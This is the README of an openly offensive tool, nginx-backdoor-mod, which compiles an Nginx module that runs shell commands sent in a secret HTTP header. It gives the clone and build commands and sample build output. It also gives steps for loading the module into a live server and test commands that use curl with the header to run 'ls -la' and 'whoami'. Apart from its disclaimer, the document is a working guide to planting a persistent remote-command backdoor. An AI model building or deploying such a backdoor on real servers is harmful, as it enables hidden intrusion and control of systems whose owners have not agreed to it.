README.md


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125

# nginx-backdoor-mod

`nginx-backdoor-mod` is a penetration testing tool designed to create a custom Nginx module that adds a backdoor for executing system commands via HTTP headers. This tool is intended for authorized security testing to evaluate the security of Nginx-based web servers.

> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.

## Features

- **Dynamic Nginx Module Creation**: Build a custom Nginx module with a specified name and backdoor header.
- **Command Execution via HTTP Headers**: Execute system commands on the server by sending a specific HTTP header.
- **Support for Multiple Nginx Versions**: Download and build against specified Nginx releases from `nginx.org`.
- **Dockerized Build Environment**: Use a Docker container to ensure consistent build dependencies.
- **List Available Nginx Releases**: Retrieve a list of available Nginx versions for module compilation.

## Installation

### Prerequisites

- **Docker**: Required to build the module in a consistent environment.
- **Bash**: For running the build scripts.
- **curl**: For downloading Nginx source code.

### Steps

- Clone the repository:

```
$ git clone https://cgit.heqnx.com/nginx-backdoor-mod
$ cd nginx-backdoor-mod
```

- Build the docker environment with nginx mod build script:

```
$ ./build.sh
[...]
$ usage: build-nginx-backdoor-mod.sh [-l] [-r -n]

-l     list nginx releases
-r     choose release
-n     set name for the built nginx module
-h     print this help message and exit
```

## Usage

### Command-Line Flags

```
$ ./build.sh
[...]
$ usage: build-nginx-backdoor-mod.sh [-l] [-r -n]

-l     list nginx releases
-r     choose release
-n     set name for the built nginx module
-h     print this help message and exit
```

### Examples

#### List available Nginx releases

```
$ ./build-nginx-backdoor-mod.sh -l
[inf] releases provided by nginx.org
nginx-1.24.0.tar.gz
nginx-1.25.0.tar.gz
nginx-1.26.0.tar.gz
[...]
```

#### Build a backdoor module for Nginx 1.20.1

```
$ ./build.sh -r nginx-1.20.1.tar.gz -n test
[inf] downloading https://nginx.org/download/nginx-1.20.1.tar.gz
[inf] extracting nginx-1.20.1.tar.gz to /root/nginx-backdoor-mod
[inf] configure successful
[inf] successfully built test.so

[inf] output module "/root/nginx-backdoor-mod/test_v1.20.1_X-325901e0f4512f4c22a43a6eb455ae0b.so"
[inf] use "X-325901e0f4512f4c22a43a6eb455ae0b" for backdoor authentication + command execution
[inf] example: curl http://localhost -H 'X-325901e0f4512f4c22a43a6eb455ae0b: ls -la'
[inf] enable with nginx module config in /etc/nginx/modules-enabled and "load_module /path/to/test.so;"
[inf] enable with the main nginx config in /etc/nginx/nginx.conf and "load_module /path/to/test.so;"
```

#### Deploy the module

- Copy the generated `.so` file (e.g., `test_v1.20.1_X-<random>.so`) to your Nginx server’s modules directory (e.g., `/usr/lib/nginx/modules/`).

- Add the module to your Nginx configuration in `/etc/nginx/nginx.conf` or a file in `/etc/nginx/modules-enabled/`:

```
load_module /usr/lib/nginx/modules/test_v1.20.1.so;
```

- Reload or restart Nginx:

```
$ nginx -s reload
$ systemctl restart nginx
```

- Test the backdoor by sending a command via the specified header:

```
$ curl http://localhost -H 'X-<random>: whoami'
```

## Technical Details

- **Docker Build**: The tool uses a Dockerfile to create an Ubuntu-based environment with dependencies (`build-essential`, `libpcre3`, `zlib1g`, `libssl-dev`, `curl`).
- **Module Template**: The `ngx_mod_template/` directory contains a `config` file and `ngx_mod_template.c`, which are modified during the build to set the module name and backdoor header.
- **Backdoor Mechanism**: The module checks for a specific HTTP header (randomly generated during the build) and executes its value as a shell command using `/bin/sh`.
- **Output**: The compiled module is saved as `<name>_v<version>_<header>.so` in the `nginx-backdoor-mod/` directory.

## License

This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.

## Disclaimer

`nginx-backdoor-mod` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.